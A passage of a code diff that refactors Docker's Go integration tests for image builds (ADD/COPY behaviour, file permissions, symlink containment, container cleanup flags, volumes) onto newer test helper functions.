name := "testcopywildcardinname" - ctx, err := fakeContext(`FROM busybox + // Run this only on Linux + // Below is the original comment (that I don't agree with — vdemeester) + // Normally we would do c.Fatal(err) here but given that + // the odds of this failing are so rare, it must be because + // the OS we're running the client on doesn't support * in + // filenames (like windows). So, instead of failing the test + // just let it pass. Then we don't need to explicitly + // say which OSs this works on or not. + testRequires(c, DaemonIsLinux, UnixCli) + + buildImageSuccessfully(c, "testcopywildcardinname", build.WithBuildContext(c, + build.WithFile("Dockerfile", `FROM busybox COPY *.txt /tmp/ RUN [ "$(cat /tmp/\*.txt)" = 'hi there' ] - `, map[string]string{"*.txt": "hi there"}) - - if err != nil { - // Normally we would do c.Fatal(err) here but given that - // the odds of this failing are so rare, it must be because - // the OS we're running the client on doesn't support * in - // filenames (like windows). So, instead of failing the test - // just let it pass. Then we don't need to explicitly - // say which OSs this works on or not. - return - } - defer ctx.Close() - - _, err = buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatalf("should have built: %q", err) - } + `), + build.WithFile("*.txt", "hi there"), + )) } func (s *DockerSuite) TestBuildCopyWildcardCache(c *check.C) { name := "testcopywildcardcache" - ctx, err := fakeContext(`FROM busybox - COPY file1.txt /tmp/`, - map[string]string{ + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(`FROM busybox + COPY file1.txt /tmp/`), + fakecontext.WithFiles(map[string]string{ "file1.txt": "test1", - }) - if err != nil { - c.Fatal(err) - } + })) defer ctx.Close() - id1, err := buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx)) + id1 := getIDByName(c, name) // Now make sure we use a cache the 2nd time even with wild cards. // Use the same context so the file is the same and the checksum will match ctx.Add("Dockerfile", `FROM busybox COPY file*.txt /tmp/`) - id2, err := buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx)) + id2 := getIDByName(c, name) if id1 != id2 { c.Fatal("didn't use the cache") @@ -1003,8 +720,8 @@ func (s *DockerSuite) TestBuildCopyWildcardCache(c *check.C) { func (s *DockerSuite) TestBuildAddSingleFileToNonExistingDir(c *check.C) { testRequires(c, DaemonIsLinux) // Linux specific test - name := "testaddsinglefiletononexistingdir" - ctx, err := fakeContext(`FROM busybox + buildImageSuccessfully(c, "testaddsinglefiletononexistingdir", build.WithBuildContext(c, + build.WithFile("Dockerfile", `FROM busybox RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd RUN echo 'dockerio:x:1001:' >> /etc/group RUN touch /exists @@ -1012,49 +729,28 @@ RUN chown dockerio.dockerio /exists ADD test_file /test_dir/ RUN [ $(ls -l / | grep test_dir | awk '{print $3":"$4}') = 'root:root' ] RUN [ $(ls -l /test_dir/test_file | awk '{print $3":"$4}') = 'root:root' ] -RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, - map[string]string{ - "test_file": "test1", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } - +RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`), + build.WithFile("test_file", "test1"))) } func (s *DockerSuite) TestBuildAddDirContentToRoot(c *check.C) { testRequires(c, DaemonIsLinux) // Linux specific test - name := "testadddircontenttoroot" - ctx, err := fakeContext(`FROM busybox + buildImageSuccessfully(c, "testadddircontenttoroot", build.WithBuildContext(c, + build.WithFile("Dockerfile", `FROM busybox RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd RUN echo 'dockerio:x:1001:' >> /etc/group RUN touch /exists RUN chown dockerio.dockerio exists ADD test_dir / RUN [ $(ls -l /test_file | awk '{print $3":"$4}') = 'root:root' ] -RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, - map[string]string{ - "test_dir/test_file": "test1", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } +RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`), + build.WithFile("test_dir/test_file", "test1"))) } func (s *DockerSuite) TestBuildAddDirContentToExistingDir(c *check.C) { testRequires(c, DaemonIsLinux) // Linux specific test - name := "testadddircontenttoexistingdir" - ctx, err := fakeContext(`FROM busybox + buildImageSuccessfully(c, "testadddircontenttoexistingdir", build.WithBuildContext(c, + build.WithFile("Dockerfile", `FROM busybox RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd RUN echo 'dockerio:x:1001:' >> /etc/group RUN mkdir /exists @@ -1063,24 +759,14 @@ RUN chown -R dockerio.dockerio /exists ADD test_dir/ /exists/ RUN [ $(ls -l / | grep exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ] RUN [ $(ls -l /exists/exists_file | awk '{print $3":"$4}') = 'dockerio:dockerio' ] -RUN [ $(ls -l /exists/test_file | awk '{print $3":"$4}') = 'root:root' ]`, - map[string]string{ - "test_dir/test_file": "test1", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } +RUN [ $(ls -l /exists/test_file | awk '{print $3":"$4}') = 'root:root' ]`), + build.WithFile("test_dir/test_file", "test1"))) } func (s *DockerSuite) TestBuildAddWholeDirToRoot(c *check.C) { testRequires(c, DaemonIsLinux) // Linux specific test - name := "testaddwholedirtoroot" - ctx, err := fakeContext(fmt.Sprintf(`FROM busybox + buildImageSuccessfully(c, "testaddwholedirtoroot", build.WithBuildContext(c, + build.WithFile("Dockerfile", fmt.Sprintf(`FROM busybox RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd RUN echo 'dockerio:x:1001:' >> /etc/group RUN touch /exists @@ -1090,67 +776,40 @@ RUN [ $(ls -l / | grep test_dir | awk '{print $3":"$4}') = 'root:root' ] RUN [ $(ls -l / | grep test_dir | awk '{print $1}') = 'drwxr-xr-x' ] RUN [ $(ls -l /test_dir/test_file | awk '{print $3":"$4}') = 'root:root' ] RUN [ $(ls -l /test_dir/test_file | awk '{print $1}') = '%s' ] -RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, expectedFileChmod), - map[string]string{ - "test_dir/test_file": "test1", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } +RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, expectedFileChmod)), + build.WithFile("test_dir/test_file", "test1"))) } -// Testing #5941 -func (s *DockerSuite) TestBuildAddEtcToRoot(c *check.C) { - name := "testaddetctoroot" - - ctx, err := fakeContext(`FROM `+minimalBaseImage()+` -ADD . /`, - map[string]string{ - "etc/test_file": "test1", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } +// Testing #5941 : Having an etc directory in context conflicts with the /etc/mtab +func (s *DockerSuite) TestBuildAddOrCopyEtcToRootShouldNotConflict(c *check.C) { + buildImageSuccessfully(c, "testaddetctoroot", build.WithBuildContext(c, + build.WithFile("Dockerfile", `FROM `+minimalBaseImage()+` +ADD . /`), + build.WithFile("etc/test_file", "test1"))) + buildImageSuccessfully(c, "testcopyetctoroot", build.WithBuildContext(c, + build.WithFile("Dockerfile", `FROM `+minimalBaseImage()+` +COPY . /`), + build.WithFile("etc/test_file", "test1"))) } -// Testing #9401 +// Testing #9401 : Losing setuid flag after a ADD func (s *DockerSuite) TestBuildAddPreservesFilesSpecialBits(c *check.C) { testRequires(c, DaemonIsLinux) // Linux specific test - name := "testaddpreservesfilesspecialbits" - ctx, err := fakeContext(`FROM busybox + buildImageSuccessfully(c, "testaddetctoroot", build.WithBuildContext(c, + build.WithFile("Dockerfile", `FROM busybox ADD suidbin /usr/bin/suidbin RUN chmod 4755 /usr/bin/suidbin RUN [ $(ls -l /usr/bin/suidbin | awk '{print $1}') = '-rwsr-xr-x' ] ADD ./data/ / -RUN [ $(ls -l /usr/bin/suidbin | awk '{print $1}') = '-rwsr-xr-x' ]`, - map[string]string{ - "suidbin": "suidbin", - "/data/usr/test_file": "test1", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } +RUN [ $(ls -l /usr/bin/suidbin | awk '{print $1}') = '-rwsr-xr-x' ]`), + build.WithFile("suidbin", "suidbin"), + build.WithFile("/data/usr/test_file", "test1"))) } func (s *DockerSuite) TestBuildCopySingleFileToRoot(c *check.C) { testRequires(c, DaemonIsLinux) // Linux specific test - name := "testcopysinglefiletoroot" - ctx, err := fakeContext(fmt.Sprintf(`FROM busybox + buildImageSuccessfully(c, "testcopysinglefiletoroot", build.WithBuildContext(c, + build.WithFile("Dockerfile", fmt.Sprintf(`FROM busybox RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd RUN echo 'dockerio:x:1001:' >> /etc/group RUN touch /exists @@ -1158,37 +817,23 @@ RUN chown dockerio.dockerio /exists COPY test_file / RUN [ $(ls -l /test_file | awk '{print $3":"$4}') = 'root:root' ] RUN [ $(ls -l /test_file | awk '{print $1}') = '%s' ] -RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, expectedFileChmod), - map[string]string{ - "test_file": "test1", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } +RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, expectedFileChmod)), + build.WithFile("test_file", "test1"))) } // Issue #3960: "ADD src ." hangs - adapted for COPY func (s *DockerSuite) TestBuildCopySingleFileToWorkdir(c *check.C) { name := "testcopysinglefiletoworkdir" - ctx, err := fakeContext(`FROM busybox -COPY test_file .`, - map[string]string{ + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(`FROM busybox +COPY test_file .`), + fakecontext.WithFiles(map[string]string{ "test_file": "test1", - }) - if err != nil { - c.Fatal(err) - } + })) defer ctx.Close() errChan := make(chan error) go func() { - _, err := buildImageFromContext(name, ctx, true) - errChan <- err + errChan <- buildImage(name, build.WithExternalBuildContext(ctx)).Error close(errChan) }() select { @@ -1201,8 +846,8 @@ COPY test_file .`, func (s *DockerSuite) TestBuildCopySingleFileToExistDir(c *check.C) { testRequires(c, DaemonIsLinux) // Linux specific test - name := "testcopysinglefiletoexistdir" - ctx, err := fakeContext(`FROM busybox + buildImageSuccessfully(c, "testcopysinglefiletoexistdir", build.WithBuildContext(c, + build.WithFile("Dockerfile", `FROM busybox RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd RUN echo 'dockerio:x:1001:' >> /etc/group RUN mkdir /exists @@ -1211,24 +856,14 @@ RUN chown -R dockerio.dockerio /exists COPY test_file /exists/ RUN [ $(ls -l / | grep exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ] RUN [ $(ls -l /exists/test_file | awk '{print $3":"$4}') = 'root:root' ] -RUN [ $(ls -l /exists/exists_file | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, - map[string]string{ - "test_file": "test1", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } +RUN [ $(ls -l /exists/exists_file | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`), + build.WithFile("test_file", "test1"))) } func (s *DockerSuite) TestBuildCopySingleFileToNonExistDir(c *check.C) { - testRequires(c, DaemonIsLinux) // Linux specific test - name := "testcopysinglefiletononexistdir" - ctx, err := fakeContext(`FROM busybox + testRequires(c, DaemonIsLinux) // Linux specific + buildImageSuccessfully(c, "testcopysinglefiletononexistdir", build.WithBuildContext(c, + build.WithFile("Dockerfile", `FROM busybox RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd RUN echo 'dockerio:x:1001:' >> /etc/group RUN touch /exists @@ -1236,48 +871,28 @@ RUN chown dockerio.dockerio /exists COPY test_file /test_dir/ RUN [ $(ls -l / | grep test_dir | awk '{print $3":"$4}') = 'root:root' ] RUN [ $(ls -l /test_dir/test_file | awk '{print $3":"$4}') = 'root:root' ] -RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, - map[string]string{ - "test_file": "test1", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } +RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`), + build.WithFile("test_file", "test1"))) } func (s *DockerSuite) TestBuildCopyDirContentToRoot(c *check.C) { testRequires(c, DaemonIsLinux) // Linux specific test - name := "testcopydircontenttoroot" - ctx, err := fakeContext(`FROM busybox + buildImageSuccessfully(c, "testcopydircontenttoroot", build.WithBuildContext(c, + build.WithFile("Dockerfile", `FROM busybox RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd RUN echo 'dockerio:x:1001:' >> /etc/group RUN touch /exists RUN chown dockerio.dockerio exists COPY test_dir / RUN [ $(ls -l /test_file | awk '{print $3":"$4}') = 'root:root' ] -RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, - map[string]string{ - "test_dir/test_file": "test1", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } +RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`), + build.WithFile("test_dir/test_file", "test1"))) } func (s *DockerSuite) TestBuildCopyDirContentToExistDir(c *check.C) { testRequires(c, DaemonIsLinux) // Linux specific test - name := "testcopydircontenttoexistdir" - ctx, err := fakeContext(`FROM busybox + buildImageSuccessfully(c, "testcopydircontenttoexistdir", build.WithBuildContext(c, + build.WithFile("Dockerfile", `FROM busybox RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd RUN echo 'dockerio:x:1001:' >> /etc/group RUN mkdir /exists @@ -1286,24 +901,14 @@ RUN chown -R dockerio.dockerio /exists COPY test_dir/ /exists/ RUN [ $(ls -l / | grep exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ] RUN [ $(ls -l /exists/exists_file | awk '{print $3":"$4}') = 'dockerio:dockerio' ] -RUN [ $(ls -l /exists/test_file | awk '{print $3":"$4}') = 'root:root' ]`, - map[string]string{ - "test_dir/test_file": "test1", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } +RUN [ $(ls -l /exists/test_file | awk '{print $3":"$4}') = 'root:root' ]`), + build.WithFile("test_dir/test_file", "test1"))) } func (s *DockerSuite) TestBuildCopyWholeDirToRoot(c *check.C) { testRequires(c, DaemonIsLinux) // Linux specific test - name := "testcopywholedirtoroot" - ctx, err := fakeContext(fmt.Sprintf(`FROM busybox + buildImageSuccessfully(c, "testcopywholedirtoroot", build.WithBuildContext(c, + build.WithFile("Dockerfile", fmt.Sprintf(`FROM busybox RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd RUN echo 'dockerio:x:1001:' >> /etc/group RUN touch /exists @@ -1313,36 +918,8 @@ RUN [ $(ls -l / | grep test_dir | awk '{print $3":"$4}') = 'root:root' ] RUN [ $(ls -l / | grep test_dir | awk '{print $1}') = 'drwxr-xr-x' ] RUN [ $(ls -l /test_dir/test_file | awk '{print $3":"$4}') = 'root:root' ] RUN [ $(ls -l /test_dir/test_file | awk '{print $1}') = '%s' ] -RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, expectedFileChmod), - map[string]string{ - "test_dir/test_file": "test1", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } -} - -func (s *DockerSuite) TestBuildCopyEtcToRoot(c *check.C) { - name := "testcopyetctoroot" - - ctx, err := fakeContext(`FROM `+minimalBaseImage()+` -COPY . /`, - map[string]string{ - "etc/test_file": "test1", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } +RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, expectedFileChmod)), + build.WithFile("test_dir/test_file", "test1"))) } func (s *DockerSuite) TestBuildAddBadLinks(c *check.C) { @@ -1357,10 +934,7 @@ func (s *DockerSuite) TestBuildAddBadLinks(c *check.C) { var ( name = "test-link-absolute" ) - ctx, err := fakeContext(dockerfile, nil) - if err != nil { - c.Fatal(err) - } + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(dockerfile)) defer ctx.Close() tempDir, err := ioutil.TempDir("", "test-link-absolute-temp-") @@ -1421,10 +995,7 @@ func (s *DockerSuite) TestBuildAddBadLinks(c *check.C) { c.Fatal(err) } - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } - + buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx)) if _, err := os.Stat(nonExistingFile); err == nil || err != nil && !os.IsNotExist(err) { c.Fatalf("%s shouldn't have been written and it shouldn't exist", nonExistingFile) } @@ -1455,10 +1026,7 @@ func (s *DockerSuite) TestBuildAddBadLinksVolume(c *check.C) { dockerfile = fmt.Sprintf(dockerfileTemplate, tempDir) nonExistingFile := filepath.Join(tempDir, targetFile) - ctx, err := fakeContext(dockerfile, nil) - if err != nil { - c.Fatal(err) - } + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(dockerfile)) defer ctx.Close() fooPath := filepath.Join(ctx.Dir, targetFile) @@ -1472,10 +1040,7 @@ func (s *DockerSuite) TestBuildAddBadLinksVolume(c *check.C) { c.Fatal(err) } - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } - + buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx)) if _, err := os.Stat(nonExistingFile); err == nil || err != nil && !os.IsNotExist(err) { c.Fatalf("%s shouldn't have been written and it shouldn't exist", nonExistingFile) } @@ -1485,84 +1050,83 @@ func (s *DockerSuite) TestBuildAddBadLinksVolume(c *check.C) { // Issue #5270 - ensure we throw a better error than "unexpected EOF" // when we can't access files in the context. func (s *DockerSuite) TestBuildWithInaccessibleFilesInContext(c *check.C) { - testRequires(c, DaemonIsLinux, UnixCli) // test uses chown/chmod: not available on windows + testRequires(c, DaemonIsLinux, UnixCli, SameHostDaemon) // test uses chown/chmod: not available on windows { name := "testbuildinaccessiblefiles" - ctx, err := fakeContext("FROM scratch\nADD . /foo/", map[string]string{"fileWithoutReadAccess": "foo"}) - if err != nil { - c.Fatal(err) - } + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile("FROM scratch\nADD . /foo/"), + fakecontext.WithFiles(map[string]string{"fileWithoutReadAccess": "foo"}), + ) defer ctx.Close() // This is used to ensure we detect inaccessible files early during build in the cli client pathToFileWithoutReadAccess := filepath.Join(ctx.Dir, "fileWithoutReadAccess") - if err = os.Chown(pathToFileWithoutReadAccess, 0, 0); err != nil { + if err := os.Chown(pathToFileWithoutReadAccess, 0, 0); err != nil { c.Fatalf("failed to chown file to root: %s", err) } - if err = os.Chmod(pathToFileWithoutReadAccess, 0700); err != nil { + if err := os.Chmod(pathToFileWithoutReadAccess, 0700); err != nil { c.Fatalf("failed to chmod file to 700: %s", err) } - buildCmd := exec.Command("su", "unprivilegeduser", "-c", fmt.Sprintf("%s build -t %s .", dockerBinary, name)) - buildCmd.Dir = ctx.Dir - out, _, err := runCommandWithOutput(buildCmd) - if err == nil { - c.Fatalf("build should have failed: %s %s", err, out) + result := icmd.RunCmd(icmd.Cmd{ + Command: []string{"su", "unprivilegeduser", "-c", fmt.Sprintf("%s build -t %s .", dockerBinary, name)}, + Dir: ctx.Dir, + }) + if result.Error == nil { + c.Fatalf("build should have failed: %s %s", result.Error, result.Combined()) } // check if we've detected the failure before we started building - if !strings.Contains(out, "no permission to read from ") { - c.Fatalf("output should've contained the string: no permission to read from but contained: %s", out) + if !strings.Contains(result.Combined(), "no permission to read from ") { + c.Fatalf("output should've contained the string: no permission to read from but contained: %s", result.Combined()) } - if !strings.Contains(out, "Error checking context") { - c.Fatalf("output should've contained the string: Error checking context") + if !strings.Contains(result.Combined(), "error checking context") { + c.Fatalf("output should've contained the string: error checking context") } } { name := "testbuildinaccessibledirectory" - ctx, err := fakeContext("FROM scratch\nADD . /foo/", map[string]string{"directoryWeCantStat/bar": "foo"}) - if err != nil { - c.Fatal(err) - } + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile("FROM scratch\nADD . /foo/"), + fakecontext.WithFiles(map[string]string{"directoryWeCantStat/bar": "foo"}), + ) defer ctx.Close() // This is used to ensure we detect inaccessible directories early during build in the cli client pathToDirectoryWithoutReadAccess := filepath.Join(ctx.Dir, "directoryWeCantStat") pathToFileInDirectoryWithoutReadAccess := filepath.Join(pathToDirectoryWithoutReadAccess, "bar") - if err = os.Chown(pathToDirectoryWithoutReadAccess, 0, 0); err != nil { + if err := os.Chown(pathToDirectoryWithoutReadAccess, 0, 0); err != nil { c.Fatalf("failed to chown directory to root: %s", err) } - if err = os.Chmod(pathToDirectoryWithoutReadAccess, 0444); err != nil { + if err := os.Chmod(pathToDirectoryWithoutReadAccess, 0444); err != nil { c.Fatalf("failed to chmod directory to 444: %s", err) } - if err = os.Chmod(pathToFileInDirectoryWithoutReadAccess, 0700); err != nil { + if err := os.Chmod(pathToFileInDirectoryWithoutReadAccess, 0700); err != nil { c.Fatalf("failed to chmod file to 700: %s", err) } - buildCmd := exec.Command("su", "unprivilegeduser", "-c", fmt.Sprintf("%s build -t %s .", dockerBinary, name)) - buildCmd.Dir = ctx.Dir - out, _, err := runCommandWithOutput(buildCmd) - if err == nil { - c.Fatalf("build should have failed: %s %s", err, out) + result := icmd.RunCmd(icmd.Cmd{ + Command: []string{"su", "unprivilegeduser", "-c", fmt.Sprintf("%s build -t %s .", dockerBinary, name)}, + Dir: ctx.Dir, + }) + if result.Error == nil { + c.Fatalf("build should have failed: %s %s", result.Error, result.Combined()) } // check if we've detected the failure before we started building - if !strings.Contains(out, "can't stat") { - c.Fatalf("output should've contained the string: can't access %s", out) + if !strings.Contains(result.Combined(), "can't stat") { + c.Fatalf("output should've contained the string: can't access %s", result.Combined()) } - if !strings.Contains(out, "Error checking context") { - c.Fatalf("output should've contained the string: Error checking context\ngot:%s", out) + if !strings.Contains(result.Combined(), "error checking context") { + c.Fatalf("output should've contained the string: error checking context\ngot:%s", result.Combined()) } } { name := "testlinksok" - ctx, err := fakeContext("FROM scratch\nADD . /foo/", nil) - if err != nil { - c.Fatal(err) - } + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile("FROM scratch\nADD . /foo/")) defer ctx.Close() target := "../../../../../../../../../../../../../../../../../../../azA" @@ -1572,31 +1136,28 @@ func (s *DockerSuite) TestBuildWithInaccessibleFilesInContext(c *check.C) { defer os.Remove(target) // This is used to ensure we don't follow links when checking if everything in the context is accessible // This test doesn't require that we run commands as an unprivileged user - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx)) } { name := "testbuildignoredinaccessible" - ctx, err := fakeContext("FROM scratch\nADD . /foo/", - map[string]string{ + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile("FROM scratch\nADD . /foo/"), + fakecontext.WithFiles(map[string]string{ "directoryWeCantStat/bar": "foo", ".dockerignore": "directoryWeCantStat", - }) - if err != nil { - c.Fatal(err) - } + }), + ) defer ctx.Close() // This is used to ensure we don't try to add inaccessible files when they are ignored by a .dockerignore pattern pathToDirectoryWithoutReadAccess := filepath.Join(ctx.Dir, "directoryWeCantStat") pathToFileInDirectoryWithoutReadAccess := filepath.Join(pathToDirectoryWithoutReadAccess, "bar") - if err = os.Chown(pathToDirectoryWithoutReadAccess, 0, 0); err != nil { + if err := os.Chown(pathToDirectoryWithoutReadAccess, 0, 0); err != nil { c.Fatalf("failed to chown directory to root: %s", err) } - if err = os.Chmod(pathToDirectoryWithoutReadAccess, 0444); err != nil { + if err := os.Chmod(pathToDirectoryWithoutReadAccess, 0444); err != nil { c.Fatalf("failed to chmod directory to 444: %s", err) } - if err = os.Chmod(pathToFileInDirectoryWithoutReadAccess, 0700); err != nil { + if err := os.Chmod(pathToFileInDirectoryWithoutReadAccess, 0700); err != nil { c.Fatalf("failed to chmod file to 700: %s", err) } @@ -1610,27 +1171,18 @@ func (s *DockerSuite) TestBuildWithInaccessibleFilesInContext(c *check.C) { } func (s *DockerSuite) TestBuildForceRm(c *check.C) { - containerCountBefore, err := getContainerCount() - if err != nil { - c.Fatalf("failed to get the container count: %s", err) - } + containerCountBefore := getContainerCount(c) name := "testbuildforcerm" - ctx, err := fakeContext(`FROM `+minimalBaseImage()+` + r := buildImage(name, cli.WithFlags("--force-rm"), build.WithBuildContext(c, + build.WithFile("Dockerfile", `FROM busybox RUN true - RUN thiswillfail`, nil) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - dockerCmdInDir(c, ctx.Dir, "build", "-t", name, "--force-rm", ".") - - containerCountAfter, err := getContainerCount() - if err != nil { - c.Fatalf("failed to get the container count: %s", err) + RUN thiswillfail`))) + if r.ExitCode != 1 && r.ExitCode != 127 { // different on Linux / Windows + c.Fatalf("Wrong exit code") } + containerCountAfter := getContainerCount(c) if containerCountBefore != containerCountAfter { c.Fatalf("--force-rm shouldn't have left containers behind") } @@ -1640,84 +1192,45 @@ func (s *DockerSuite) TestBuildForceRm(c *check.C) { func (s *DockerSuite) TestBuildRm(c *check.C) { name := "testbuildrm" - ctx, err := fakeContext(`FROM `+minimalBaseImage()+` - ADD foo / - ADD foo /`, map[string]string{"foo": "bar"}) - if err != nil { - c.Fatal(err) + testCases := []struct { + buildflags []string + shouldLeftContainerBehind bool + }{ + // Default case (i.e. --rm=true) + { + buildflags: []string{}, + shouldLeftContainerBehind: false, + }, + { + buildflags: []string{"--rm"}, + shouldLeftContainerBehind: false, + }, + { + buildflags: []string{"--rm=false"}, + shouldLeftContainerBehind: true, + }, } - defer ctx.Close() - { - containerCountBefore, err := getContainerCount() - if err != nil { - c.Fatalf("failed to get the container count: %s", err) - } - out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "--rm", "-t", name, ".") + for _, tc := range testCases { + containerCountBefore := getContainerCount(c) - if err != nil { - c.Fatal("failed to build the image", out) - } + buildImageSuccessfully(c, name, cli.WithFlags(tc.buildflags...), build.WithDockerfile(`FROM busybox + RUN echo hello world`)) - containerCountAfter, err := getContainerCount() - if err != nil { - c.Fatalf("failed to get the container count: %s", err) + containerCountAfter := getContainerCount(c) + if tc.shouldLeftContainerBehind { + if containerCountBefore == containerCountAfter { + c.Fatalf("flags %v should have left containers behind", tc.buildflags) + } + } else { + if containerCountBefore != containerCountAfter { + c.Fatalf("flags %v shouldn't have left containers behind", tc.buildflags) + } } - if containerCountBefore != containerCountAfter { - c.Fatalf("-rm shouldn't have left containers behind") - } - deleteImages(name) + dockerCmd(c, "rmi", name) } - - { - containerCountBefore, err := getContainerCount() - if err != nil { - c.Fatalf("failed to get the container count: %s", err) - } - - out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "-t", name, ".") - - if err != nil { - c.Fatal("failed to build the image", out) - } - - containerCountAfter, err := getContainerCount() - if err != nil { - c.Fatalf("failed to get the container count: %s", err) - } - - if containerCountBefore != containerCountAfter { - c.Fatalf("--rm shouldn't have left containers behind") - } - deleteImages(name) - } - - { - containerCountBefore, err := getContainerCount() - if err != nil { - c.Fatalf("failed to get the container count: %s", err) - } - - out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "--rm=false", "-t", name, ".") - - if err != nil { - c.Fatal("failed to build the image", out) - } - - containerCountAfter, err := getContainerCount() - if err != nil { - c.Fatalf("failed to get the container count: %s", err) - } - - if containerCountBefore == containerCountAfter { - c.Fatalf("--rm=false should have left containers behind") - } - deleteImages(name) - - } - -} +} func (s *DockerSuite) TestBuildWithVolumes(c *check.C) { testRequires(c, DaemonIsLinux) // Invalid volume paths on Windows @@ -1736,27 +1249,18 @@ func (s *DockerSuite) TestBuildWithVolumes(c *check.C) { "/test8]": emptyMap, } ) - _, err := buildImage(name, - `FROM scratch + + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM scratch VOLUME /test1 VOLUME /test2 VOLUME /test3 /test4 VOLUME ["/test5", "/test6"] VOLUME [/test7 /test8] - `, - true) - if err != nil { - c.Fatal(err) - } - res := inspectFieldJSON(c, name, "Config.Volumes") + `)) - err = json.Unmarshal([]byte(res), &result) - if err != nil { - c.Fatal(err) - } + inspectFieldAndUnmarshall(c, name, "Config.Volumes", &result) equal := reflect.DeepEqual(&result, &expected) - if !equal { c.Fatalf("Volumes %s, expected %s", result, expected) } @@ -1766,14 +1270,10 @@ func (s *DockerSuite) TestBuildWithVolumes(c *check.C) { func (s *DockerSuite) TestBuildMaintainer(c *check.C) { name := "testbuildmaintainer" + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM `+minimalBaseImage()+` + MAINTAINER dockerio`)) + expected := "dockerio" - _, err := buildImage(name, - `FROM `+minimalBaseImage()+` - MAINTAINER dockerio`, - true) - if err != nil { - c.Fatal(err) - } res := inspectField(c, name, "Author") if res != expected 